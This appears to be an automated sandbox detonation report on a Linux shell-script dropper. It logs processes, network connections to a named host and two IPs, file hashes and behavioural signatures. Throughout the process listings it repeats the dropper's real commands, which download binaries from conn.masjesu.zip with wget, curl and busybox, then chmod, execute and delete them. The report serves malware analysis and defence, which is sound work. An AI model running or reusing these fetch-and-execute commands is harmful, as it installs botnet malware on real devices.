[rm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/chmod

[chmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S

[./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/rm

[rm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/chmod

[chmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A

[./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/rm

[rm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/chmod

[chmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv

[./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/rm

[rm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/chmod

[chmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp

[./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/rm

[rm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/chmod

[chmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4

[./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/rm

[rm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/chmod

[chmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7

[./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/rm

[rm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/chmod

[chmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw

[./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/rm

[rm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/chmod

[chmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn

[./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/rm

[rm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp

Files

/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 03:08

Reported

2024-10-18 03:11

Platform

debian9-mipsel-20240418-en

Max time kernel

109s

Max time network

111s

Command Line

[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL N/A
N/A /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK N/A
N/A /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB N/A
N/A /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I N/A
N/A /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O N/A
N/A /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ N/A
N/A /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S N/A
N/A /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv N/A
N/A /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp N/A
N/A /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 N/A
N/A /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 N/A
N/A /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw N/A
N/A /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn N/A
N/A /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A N/A
N/A /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL N/A
N/A /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK N/A
N/A /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB N/A
N/A /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I N/A
N/A /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O N/A
N/A /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ N/A
N/A /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S N/A
N/A /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A N/A
N/A /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv N/A
N/A /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp N/A
N/A /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 N/A
N/A /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 N/A
N/A /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw N/A
N/A /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /usr/bin/curl N/A
File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /usr/bin/curl N/A
File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /usr/bin/curl N/A
File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /usr/bin/curl N/A
File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /usr/bin/curl N/A
File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /usr/bin/curl N/A
File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /usr/bin/curl N/A
File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /usr/bin/curl N/A
File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /usr/bin/curl N/A
File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /usr/bin/curl N/A
File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /usr/bin/curl N/A
File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /usr/bin/curl N/A
File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /usr/bin/curl N/A
File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /usr/bin/curl N/A
File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /usr/bin/curl N/A
File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /usr/bin/curl N/A
File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /usr/bin/curl N/A
File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /usr/bin/curl N/A
File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /usr/bin/curl N/A
File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /usr/bin/curl N/A
File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /usr/bin/curl N/A
File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /usr/bin/curl N/A
File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /usr/bin/curl N/A
File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /usr/bin/curl N/A
File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /usr/bin/curl N/A
File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /usr/bin/curl N/A
File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /usr/bin/curl N/A
File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /usr/bin/curl N/A

Processes

/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh

[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/chmod

[chmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL

[./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/rm

[rm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

